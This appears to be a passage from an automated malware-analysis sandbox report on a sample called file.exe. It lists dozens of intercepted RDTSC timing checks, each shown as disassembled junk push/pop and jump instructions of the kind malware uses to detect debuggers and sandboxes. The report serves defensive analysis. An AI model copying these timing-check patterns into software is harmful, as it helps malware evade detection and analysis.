                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC2B4 second address: 12FC2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF8E8F8DBBCh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD414 second address: 12FD418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD418 second address: 12FD439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8E8F8DBC9h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD439 second address: 12FD43D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C6BE second address: 132C6C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132CD71 second address: 132CD9E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF8E8F8DBB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FF8E8F8DBD5h 0x00000012 jmp 00007FF8E8F8DBC9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133310C second address: 1333115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1333115 second address: 1333121 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8E8F8DBBEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332096 second address: 13320A2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13320A2 second address: 13320B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1336692 second address: 13366BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF8E8F833B6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007FF8E8F833C5h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pop edx 0x0000001a pop eax 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13366BD second address: 13366C7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8E8F8DBBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1336825 second address: 133682A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133907C second address: 1339094 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FF8E8F8DBB6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FF8E8F8DBBCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339094 second address: 1339098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338C09 second address: 1338C4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC7h 0x00000007 jmp 00007FF8E8F8DBC4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FF8E8F8DBC4h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338D97 second address: 1338D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338D9B second address: 1338DCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC7h 0x00000007 jmp 00007FF8E8F8DBC7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338DCD second address: 1338DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FF8E8F833B6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CC7F second address: 133CCB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC2h 0x00000007 jne 00007FF8E8F8DBB8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF8E8F8DBC8h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C448 second address: 133C452 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF8E8F833B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C9C0 second address: 133C9CE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C9CE second address: 133C9D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340A97 second address: 1340AB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340AB5 second address: 1340AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340AB9 second address: 1340ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340ABD second address: 1340ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FF8E8F833C4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FD55 second address: 133FD65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 je 00007FF8E8F8DBB6h 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FD65 second address: 133FD6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FD6B second address: 133FD71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FED7 second address: 133FF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF8E8F833B6h 0x0000000a jc 00007FF8E8F833C8h 0x00000010 jo 00007FF8E8F833BAh 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FF09 second address: 133FF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FF0D second address: 133FF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133FF11 second address: 133FF17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13401A8 second address: 13401AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13401AC second address: 13401C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF8E8F8DBB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007FF8E8F8DBB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13401C1 second address: 13401E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F833BCh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push esi 0x0000000d jno 00007FF8E8F833B6h 0x00000013 pop esi 0x00000014 popad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13401E1 second address: 13401F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FF8E8F8DBB6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344C87 second address: 1344C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344C8D second address: 1344C93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344DB9 second address: 1344DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F833C8h 0x00000009 popad 0x0000000a jne 00007FF8E8F833C2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344DDE second address: 1344DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344DE4 second address: 1344DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13450D4 second address: 13450D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13450D8 second address: 13450E6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF8E8F833B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13450E6 second address: 13450EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1345260 second address: 1345280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FF8E8F833BEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134554A second address: 134555A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FF8E8F8DBB6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1346061 second address: 134607A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F833C4h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134607A second address: 134608E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF8E8F8DBBFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C07B second address: 134C07F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C07F second address: 134C085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C364 second address: 134C36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C36C second address: 134C380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F8DBBFh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134CC1A second address: 134CC20 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134CF22 second address: 134CF26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134CF26 second address: 134CF2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134CF2C second address: 134CF70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007FF8E8F8DBC7h 0x0000000e pushad 0x0000000f popad 0x00000010 jo 00007FF8E8F8DBB6h 0x00000016 jmp 00007FF8E8F8DBC8h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D532 second address: 134D53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D53E second address: 134D544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D544 second address: 134D54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D54F second address: 134D553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D553 second address: 134D573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833BCh 0x00000007 jnl 00007FF8E8F833B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FF8E8F833B6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134DDA7 second address: 134DDAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134DDAB second address: 134DDB7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8E8F833B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1358471 second address: 13584A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF8E8F8DBC8h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF8E8F8DBC3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13584A5 second address: 13584A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357640 second address: 1357644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357900 second address: 1357906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357B51 second address: 1357B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007FF8E8F8DBB6h 0x0000000c jmp 00007FF8E8F8DBBCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357B6B second address: 1357B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135800D second address: 1358013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1358013 second address: 1358021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FF8E8F833B8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FC97 second address: 135FCA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jl 00007FF8E8F8DBB6h 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135DFEB second address: 135DFF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135E2AB second address: 135E2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135E441 second address: 135E450 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF8E8F833BAh 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135E9C9 second address: 135E9FA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF8E8F8DBB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF8E8F8DBBAh 0x00000012 jmp 00007FF8E8F8DBC8h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135ECA6 second address: 135ECAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135ECAA second address: 135ECB7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F3CD second address: 135F40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FF8E8F833C9h 0x0000000c jg 00007FF8E8F833B6h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 jnp 00007FF8E8F833BEh 0x0000001f jng 00007FF8E8F833B6h 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F40C second address: 135F412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F412 second address: 135F416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FB47 second address: 135FB4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135D9E2 second address: 135D9EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135D9EE second address: 135DA0D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF8E8F8DBB6h 0x00000008 jmp 00007FF8E8F8DBC5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135DA0D second address: 135DA19 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135DA19 second address: 135DA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135DA1F second address: 135DA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135DA23 second address: 135DA34 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135DA34 second address: 135DA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135DA38 second address: 135DA3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1365556 second address: 136555E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368170 second address: 136817F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBBBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136817F second address: 13681BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jp 00007FF8E8F833B6h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FF8E8F833C2h 0x00000017 jng 00007FF8E8F833B6h 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f popad 0x00000020 jmp 00007FF8E8F833BFh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136831D second address: 1368323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368323 second address: 136832C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136832C second address: 1368332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1368332 second address: 1368336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1368336 second address: 1368346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FF8E8F8DBC2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
